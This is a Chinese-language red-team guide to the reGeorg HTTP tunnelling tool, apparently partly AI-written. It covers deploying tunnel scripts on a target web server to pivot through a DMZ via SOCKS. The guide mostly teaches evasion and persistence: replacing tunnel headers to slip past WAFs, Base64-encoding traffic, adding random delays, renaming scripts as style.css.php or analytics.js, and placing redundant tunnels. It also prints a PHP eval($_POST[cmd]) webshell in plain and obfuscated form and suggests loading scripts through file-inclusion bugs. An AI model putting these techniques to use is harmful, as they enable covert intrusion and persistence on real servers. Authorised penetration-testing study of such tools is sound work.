reGeorg 在红队行动中的最佳实践规避检测与持久化技术【免费下载链接】reGeorgThe successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.项目地址: https://gitcode.com/gh_mirrors/re/reGeorgreGeorg 作为一款强大的 HTTP(S) 隧道工具在红队行动中常用于突破网络边界限制建立 SOCKS 代理通道。本文将详细介绍 reGeorg 的核心功能、部署技巧及高级规避策略帮助安全从业者在实战中高效利用该工具。一、工具简介与核心功能reGeorg 是 reDuh 工具的继任者通过在目标 Web 服务器部署隧道脚本如tunnel.php、tunnel.jsp等将 SOCKS 流量伪装成 HTTP 请求实现内网穿透。其核心优势在于多平台支持提供多种服务器端脚本tunnel.php、tunnel.jsp、tunnel.aspx 等适配不同 Web 环境流量隐蔽性利用 HTTP 头部如X-CMD、X-TARGET传输控制指令规避传统流量检测会话持久化通过 Cookie 维持隧道连接状态支持长时间稳定代理二、快速部署与基础配置2.1 环境准备克隆仓库git clone https://gitcode.com/gh_mirrors/re/reGeorg cd reGeorg选择隧道脚本根据目标服务器环境选择对应脚本PHP 环境tunnel.phpJava 环境tunnel.jsp 或 tunnel.tomcat.5.jspASP.NET 环境tunnel.aspx 或 tunnel.ashx2.2 启动代理服务python reGeorgSocksProxy.py -u http://target.com/tunnel.php -l 0.0.0.0 -p 8888-u指定隧道脚本 URL-l本地监听地址默认 127.0.0.1-p本地监听端口默认 8888三、规避检测的高级技巧3.1 流量特征伪装reGeorg 默认使用X-CMD、X-TARGET等自定义 HTTP 头部易被 WAF 识别。可通过以下方式修改修改请求头编辑隧道脚本如 tunnel.php将X-CMD替换为常见头部如X-Requested-With// 原代码 $cmd $headers[X-CMD]; // 修改后 $cmd $headers[X-Requested-With];混淆传输内容对传输数据进行 Base64 编码在 reGeorgSocksProxy.py 中添加解码逻辑# 发送数据前编码 data base64.b64encode(data) # 接收数据后解码 data base64.b64decode(response.content)3.2 反爬虫与频率控制为避免因请求频率过高触发告警可在客户端添加随机延迟# reGeorgSocksProxy.py 中添加延迟逻辑 import random time.sleep(random.uniform(0.1, 0.5)) # 随机延迟 0.1-0.5 秒四、持久化技术与隐蔽部署4.1 脚本伪装与隐藏文件名伪装将隧道脚本重命名为常见资源文件如style.css.php或analytics.js代码混淆使用 PHP/JSP 混淆工具对 tunnel.php 进行加密例如// 混淆前 ?php eval($_POST[cmd]); ? // 混淆后 ?php $a_P.O.ST;$b$$a;eval($b[cmd]); ?4.2 多隧道冗余部署在不同目录部署多个隧道脚本如/js/tunnel.js、/images/tunnel.php当某个隧道被阻断时自动切换备用通道。五、常见问题与解决方案5.1 连接不稳定问题隧道频繁断开日志显示X-STATUS: FAIL解决检查目标服务器php.ini配置确保max_execution_time 0无超时限制5.2 WAF 拦截问题脚本上传后被 WAF 删除解决使用文件包含漏洞加载远程脚本或拆分脚本为多个片段绕过检测六、法律与伦理规范使用 reGeorg 进行渗透测试时必须遵守《网络安全法》及相关规定仅在授权环境中使用。未经允许的网络攻击行为将承担法律责任。项目法律声明详见 LICENSE.txt。通过本文介绍的技术与策略可显著提升 reGeorg 在复杂网络环境中的可用性与隐蔽性。实际应用中需结合目标环境灵活调整持续关注工具更新与防御技术演进。【免费下载链接】reGeorgThe successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.项目地址: https://gitcode.com/gh_mirrors/re/reGeorg创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考